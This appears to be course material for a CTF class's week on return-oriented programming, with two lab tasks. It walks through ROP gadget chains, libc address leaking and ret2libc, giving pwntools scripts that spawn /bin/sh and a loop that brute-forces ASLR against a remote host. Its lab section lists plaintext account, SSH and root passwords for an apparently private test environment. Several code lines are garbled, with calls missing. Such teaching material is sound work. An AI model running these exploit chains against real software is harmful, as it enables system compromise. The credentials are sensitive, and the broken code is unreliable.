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Week13 PWN: ROL and ROP

According to the @CTF101:

Return Oriented Programming

Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.

As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwrite saved instruction pointers, giving us control over what the program does next. Most programs don't have a convenient give_shell function however, so we need to find a way to manually invoke system or another exec function to get us our shell.

32 bit

Imagine we have a program similar to the following:

#include <stdio.h>
#include <stdlib.h>

char name[32];

int main() {
    printf("What's your name? ");
    read(0, name, 32);

    printf("Hi %s\n", name);

    printf("The time is currently ");

    char echo[100];
    printf("What do you want me to echo back? ");
    read(0, echo, 1000);

    return 0;

We obviously have a stack buffer overflow on the echo variable which can give us EIP control when main returns. But we don't have a give_shell function! So what can we do?

We can call system with an argument we control! Since arguments are passed in on the stack in 32-bit Linux programs (see calling conventions), if we have stack control, we have argument control.

When main returns, we want our stack to look like something had normally called system. Recall what is on the stack after a function has been called:

        ...                                 // More arguments
        0xffff0008: 0x00000002              // Argument 2
        0xffff0004: 0x00000001              // Argument 1
ESP ->  0xffff0000: 0x080484d0              // Return address

So main's stack frame needs to look like this:

        0xffff0008: 0xdeadbeef              // system argument 1
        0xffff0004: 0xdeadbeef              // return address for system
ESP ->  0xffff0000: 0x08048450              // return address for main (system's PLT entry)

Then when main returns, it will jump into system's PLT entry and the stack will appear just like system had been called normally for the first time.

Note: we don't care about the return address system will return to because we will have already gotten our shell by then!


This is a good start, but we need to pass an argument to system for anything to happen. As mentioned in the page on ASLR, the stack and dynamic libraries "move around" each time a program is run, which means we can't easily use data on the stack or a string in libc for our argument. In this case however, we have a very convenient name global which will be at a known location in the binary (in the BSS segment).

Putting it together

Our exploit will need to do the following:

  1. Enter "sh" or another command to run as name
  2. Fill the stack with
  3. Garbage up to the saved EIP
  4. The address of system's PLT entry
  5. A fake return address for system to jump to when it's done
  6. The address of the name global to act as the first argument to system

64 bit

In 64-bit binaries we have to work a bit harder to pass arguments to functions. The basic idea of overwriting the saved RIP is the same, but as discussed in calling conventions, arguments are passed in registers in 64-bit programs. In the case of running system, this means we will need to find a way to control the RDI register.

To do this, we'll use small snippets of assembly in the binary, called "gadgets." These gadgets usually pop one or more registers off of the stack, and then call ret, which allows us to chain them together by making a large fake call stack.

For example, if we needed control of both RDI and RSI, we might find two gadgets in our program that look like this (using a tool like rp++ or ROPgadget):

0x400c01: pop rdi; ret
0x400c03: pop rsi; pop r15; ret

We can setup a fake call stack with these gadets to sequentially execute them, poping values we control into registers, and then end with a jump to system.


        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
        0xffff0018: 0x1337beef          // value we want in rsi
        0xffff0010: 0x400c03            // address that the rdi gadget's ret will return to - the pop rsi gadget
        0xffff0008: 0xdeadbeef          // value to be popped into rdi
RSP ->  0xffff0000: 0x400c01            // address of rdi gadget

Stepping through this one instruction at a time, main returns, jumping to our pop rdi gadget:

RIP = 0x400c01 (pop rdi)

        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
        0xffff0018: 0x1337beef          // value we want in rsi
        0xffff0010: 0x400c03            // address that the rdi gadget's ret will return to - the pop rsi gadget
RSP ->  0xffff0008: 0xdeadbeef          // value to be popped into rdi

pop rdi is then executed, popping the top of the stack into RDI:

RIP = 0x400c02 (ret)
RDI = 0xdeadbeef

        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
        0xffff0018: 0x1337beef          // value we want in rsi
RSP ->  0xffff0010: 0x400c03            // address that the rdi gadget's ret will return to - the pop rsi gadget

The RDI gadget then rets into our RSI gadget:

RIP = 0x400c03 (pop rsi)
RDI = 0xdeadbeef

        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
RSP ->  0xffff0018: 0x1337beef          // value we want in rsi

RSI and R15 are popped:

RIP = 0x400c05 (ret)
RDI = 0xdeadbeef
RSI = 0x1337beef

RSP ->  0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled

And finally, the RSI gadget rets, jumping to whatever function we want, but now with RDI and RSI set to values we control.

ROP - Syscall execv

The objective is to call the syscall (execv) from a ROP controlling the value of registries: RDI, RSI, RDX, RAX and obviously the RIP (the other ones doesn't matters), and controlling somewhere to write "/bin/sh"

  • RDI: Pointing to the string "/bin/bash"
  • RSI: Null
  • RDX: Null
  • RAX: Value 0x3b for x64 and 0xb for x32, because this will call execv
ROPgadget --binary vulnbinary | grep syscall
ROPgadget --binary vulnbinary | grep "rdi\|rsi\|rdx\|rax" | grep pop


If you can somehow write to an address and then get the address of where you have written then this step is unnecessary.

Elsewhere, you may search for some write-what-where. As is explained in this tutorial: you have to find something that allows you to save some value inside a registry and then save it to some controlled address inside another registry. For example some pop eax; ret , pop edx: ret , mov eax, [edx]

You can find mov gadgets doing: ROPgadget --binary vulnbinary | grep mov

Finding a place to write

If you have found some write-what-where and can control the needed registries to call execv, there is only left finding a place to write.

objdump -x vulnbinary | grep ".bss" -B1
                  CONTENTS, ALLOC, LOAD, DATA
 23 .bss          00000010  00403418  00403418  00002418  23

In this case: 0x403418

Writing "/bin/sh"

buffer += address(pop_eax) # place value into EAX
buffer += "/bin"           # 4 bytes at a time
buffer += address(pop_edx)         # place value into edx
buffer += address(writable_memory)
buffer += address(writewhatwhere)

buffer += address(pop_eax)
buffer += "//sh"
buffer += address(pop_edx)
buffer += address(writable_memory + 4)
buffer += address(writewhatwhere)

ROP - Leaking LIBC address

Quick Resume

  1. Find overflow offset
  2. Find POP_RDI, PUTS_PLT and MAIN_PLT gadgets
  3. Find memory address of puts and guess the libc version (donwload it)
  4. Given the library just exploit it

Other tutorials and binaries to practice

This tutorial is going to exploit the code/binary proposed in this tutorial: Another useful tutorial:


Filename: vuln.c

#include <stdio.h>

int main() {
    char buffer[32];
    puts("Simple ROP.\n");

    return 0;
gcc -o vuln vuln.c -fno-stack-protector  -no-pie

ROP - PWNtools template

Find my ROP-PWNtools template here. I'm going to use the code located there to make the exploit. Download the exploit and place it in the same directory as the vulnerable binary.

1- Finding the offset

The template need an offset before continuing with the exploit. If any is provided it will execute the necessary code to find it (by default OFFSET = ""):

#### Find offset ###
OFFSET = ""#"A"*72
if OFFSET == "":
    gdb.attach(, "c") #Attach and continue
    payload = cyclic(1000)
    #x/wx $rsp -- Search for bytes that crashed the application
    #cyclic_find(0x6161616b) # Find the offset of those bytes

Execute python a GDB console will be opened with the program being crashed. Inside that GDB console execute x/wx $rsp to get the bytes that were going to overwrite the RIP. Finally get the offset using a python console:

from pwn import *


After finding the offset (in this case 40) change the OFFSET variable inside the template using that value. OFFSET = "A" * 40

2- Finding Gadgets

Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call putsto find the libc being used, and later to launch the final exploit.

PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
MAIN_PLT = elf.symbols['main']
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
RET = (rop.find_gadget(['ret']))[0]"Main start: " + hex(MAIN_PLT))"Puts plt: " + hex(PUTS_PLT))"pop rdi; ret  gadget: " + hex(POP_RDI))

The PUTS_PLT is needed to call the function puts. The MAIN_PLT is needed to call the main function again after one interaction to exploit the overflow again (infinite rounds of exploitation).It is used at the end of each ROP. The POP_RDI is needed to pass a parameter to the called function.

In this step you don't need to execute anything as everything will be found by pwntools during the execution.

3- Finding LIBC library

Now is time to find which version of the libc library is being used. To do so we are going to leak the address in memory of the function putsand then we are going to search in which library version the puts version is in that address.

def get_addr(func_name):
    FUNC_GOT =[func_name] + " GOT @ " + hex(FUNC_GOT))
    # Create rop chain
    rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)

    #Send our rop-chain payload
    #p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
    print(p.clean()) # clean socket buffer (read all and print)

    #Parse leaked address
    recieved = p.recvline().strip()
    leak = u64(recieved.ljust(8, "\x00"))"Leaked libc address,  "+func_name+": "+ hex(leak))
    #If not libc yet, stop here
    if libc != "":
        libc.address = leak - libc.symbols[func_name] #Save libc base"libc base @ %s" % hex(libc.address))

    return hex(leak)

get_addr("puts") #Search for puts address in memmory to obtains libc base
if libc == "":
    print("Find the libc library and continue with the exploit... (")

To do so, the most important line of the executed code is:

rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)

This will send some bytes util overwriting the RIP is possible: OFFSET. Then, it will set the address of the gadget POP_RDI so the next address (FUNC_GOT) will be saved in the RDI registry. This is because we want to call puts passing it the address of the PUTS_GOTas the address in memory of puts function is saved in the address pointing by PUTS_GOT. After that, PUTS_PLT will be called (with PUTS_GOT inside the RDI) so puts will read the content inside PUTS_GOT (the address of puts function in memory) and will print it out. Finally, main function is called again so we can exploit the overflow again.

This way we have tricked puts function to print out the address in memory of the function puts (which is inside libc library). Now that we have that address we can search which libc version is being used.


As we are exploiting some local binary it is not needed to figure out which version of libc is being used (just find the library in /lib/x86_64-linux-gnu/ But, in a remote exploit case I will explain here how can you find it:

3.1- Searching for libc version (1)

You can search which library is being used in the web page: It will also allow you to download the discovered version of libc


3.2- Searching for libc version (2)

You can also do:

  • $ git clone
  • $ cd libc-database
  • $ ./get

This will take some time, be patient. For this to work we need:

  • Libc symbol name: puts
  • Leaked libc adddress: 0x7ff629878690

We can figure out which libc that is most likely used.

./find puts 0x7ff629878690
ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
archive-glibc (id libc6_2.23-0ubuntu11_amd64)

We get 2 matches (you should try the second one if the first one is not working). Download the first one:

./download libc6_2.23-0ubuntu10_amd64
Getting libc6_2.23-0ubuntu10_amd64
  -> Location:
  -> Downloading package
  -> Extracting package
  -> Package saved to libs/libc6_2.23-0ubuntu10_amd64

Copy the libc from libs/libc6_2.23-0ubuntu10_amd64/ to our working directory.

3.3- Other functions to leak


4- Finding based libc address & exploiting

At this point we should know the libc library used. As we are exploiting a local binary I will use just:/lib/x86_64-linux-gnu/

So, at the begging of change the libc variable to: libc = ELF("/lib/x86_64-linux-gnu/") #Set library path when know it

Giving the path to the libc library the rest of the exploit is going to be automatically calculated.

Inside the get_addrfunction the base address of libc is going to be calculated:

if libc != "":
    libc.address = leak - libc.symbols[func_name] #Save libc base"libc base @ %s" % hex(libc.address))

Then, the address to the function system and the address to the string "/bin/sh" are going to be calculated from the base address of libc and given the libc library.

BINSH = next("/bin/sh")) - 64 #Verify with find /bin/sh
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]"bin/sh %s " % hex(BINSH))"system %s " % hex(SYSTEM))

Finally, the /bin/sh execution exploit is going to be prepared sent:

rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)


##### Interact with the shell #####
p.interactive() #Interact with the conenction

Let's explain this final ROP. The last ROP (rop1) ended calling again the main function, then we can exploit again the overflow (that's why the OFFSET is here again). Then, we want to call POP_RDI pointing to the addres of "/bin/sh" (BINSH) and call system function (SYSTEM) because the address of "/bin/sh" will be passed as a parameter. Finally, the address of exit function is called so the process exists nicely and any alert is generated.

This way the exploit will execute a /bin/sh shell.


4(2)- Using ONE_GADGET

You could also use ONE_GADGET to obtain a shell instead of using system and "/bin/sh". ONE_GADGET will find inside the libc library some way to obtain a shell using just one ROP. However, normally there are some constrains, the most common ones and easy to avoid are like [rsp+0x30] == NULL As you control the values inside the RSP you just have to send some more NULL values so the constrain is avoided.

ONE_GADGET = libc.address + 0x4526a
rop2 = base + p64(ONE_GADGET) + "\x00"*100


You can find a template to exploit this vulnerability here:

ROP-PWN template

Common problems

MAIN_PLT = elf.symbols['main'] not found

If the "main" symbol does not exist. Then you can just where is the main code:

objdump -d vuln_binary | grep "\.text"
Disassembly of section .text:
0000000000401080 <.text>:

and set the address manually:

MAIN_PLT = 0x401080

Puts not found

If the binary is not using Puts you should check if it is using

sh: 1: %s%s%s%s%s%s%s%s: not found

If you find this error after creating all the exploit: sh: 1: %s%s%s%s%s%s%s%s: not found

Try to subtract 64 bytes to the address of "/bin/sh":

BINSH = next("/bin/sh")) - 64


If you have found a vulnerable binary and you think that you can exploit it using Ret2Lib here you can find some basic steps that you can follow.

If you are inside the host

You can find the address of libc

ldd /path/to/executable | grep #Address (if ASLR, then this change every time)

If you want to check if the ASLR is changing the address of libc you can do:

for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done

Get offset of system function

readelf -s /lib/i386-linux-gnu/ | grep system

Get offset of "/bin/sh"

strings -a -t x /lib/i386-linux-gnu/ | grep /bin/sh


If the process is creating children every time you talk with it (network server) try to read that file (probably you will need to be root).

Here you can find exactly where is the libc loaded inside the process and where is going to be loaded for every children of the process.


In this case it is loaded in 0xb75dc000 (This will be the base address of libc)

Using gdb-peda

Get address of system function, of exit function and of the string "/bin/sh" using gdb-peda:

p system
p exit
find "/bin/sh"

Bypassing ASLR

You can try to bruteforce the abse address of libc.

for off in range(0xb7000000, 0xb8000000, 0x1000):


from pwn import *

c = remote('',20002)
c.recvline()    #Banner

for off in range(0xb7000000, 0xb8000000, 0x1000):
    p = ""
    p += p32(off + 0x0003cb20) #system
    p += "CCCC" #GARBAGE
    p += p32(off + 0x001388da) #/bin/sh
    payload = 'A'*0x20010 + p
    c.interactive() #?


(5 pt) ret2win

Challenge is from

If you are interested in the ROP exploit, please take a look at ROP Emporium.

Locate a method that you want to call within the binary. Call it by overwriting a saved return address on the stack.

nc 10001

Download binary x86_64 ELF:

Hint: check the LET'S DO THIS part of original challenge.

(5 pt) AWD prepare

We know that we are going to have a AWD CTF next week. Make sure you have access to the test AWD environment. Check the demo challenge and try to hack it to get a flag.

Browser the page in your browser, login with some test account below:

Account:TEST1 Password:YpkyiQDwGHLjoOk3
Account:TEST2 Password:pQXBpiFPlNBB6TUt
Account:TEST3 Password:cUMvgNGCb64E4uLv
Account:TEST4 Password:RQGqtTfK6601c7qY
Account:TEST5 Password:SVtm4Pd3vtAaeQvZ
Account:TEST6 Password:lNTrEnx586taV8Ow
Account:TEST7 Password:wXxFkOsGcpb1XsIo
Account:TEST8 Password:AhcNEZpaBWAm3Jst
Account:TEST9 Password:lxqzbu9tjkshQ0oB
Account:TEST10 Password:bRewQknqeY3yrZCc

The flag file is located in /var/flag/flag.txt. The application files are under /app. You have the permission to read and modify the application files.

During the AWD CTF, you can only access ctf user. Here's the account information:

IP address:
Service port: 20000-20009
SSH port: 30000-30009
Username: ctf
Password: 123456

Further, only for testing, you have the root password:

Username: root
Password: rootpassword

Please DO NOT change the password of the users during testing.

In this challenge, you should post those screenshots in your writeup:

  1. The screenshot of the port 2000x: make sure the PHP code is shown.

​ In the browser:

  1. The screenshot of the successful login to port 3000x: make sure you can access the server from user ctf.

​ In the terminal: ssh ctf@ -p 3000x

  1. The screenshot of the flag.txt content.

​ In the ssh session: cat /var/flag/flag.txt

Hope you enjoy the AWD.


Q: How to modify the file on the server?
A: Use scp command to transfer files through network. Download the file to you local machine and modify, after that then push the file to the server.
For example:
scp -P 30000 ctf@ ./
scp -P 30000 ./index.php ctf@

Q: Can I install software on the server (vim for example)?
A: You can't install software through apt. But if you have other methods, they're allowed.

Q: Can I delete flag.txt after I read it?
A: You can't. Only root can modify flag.txt.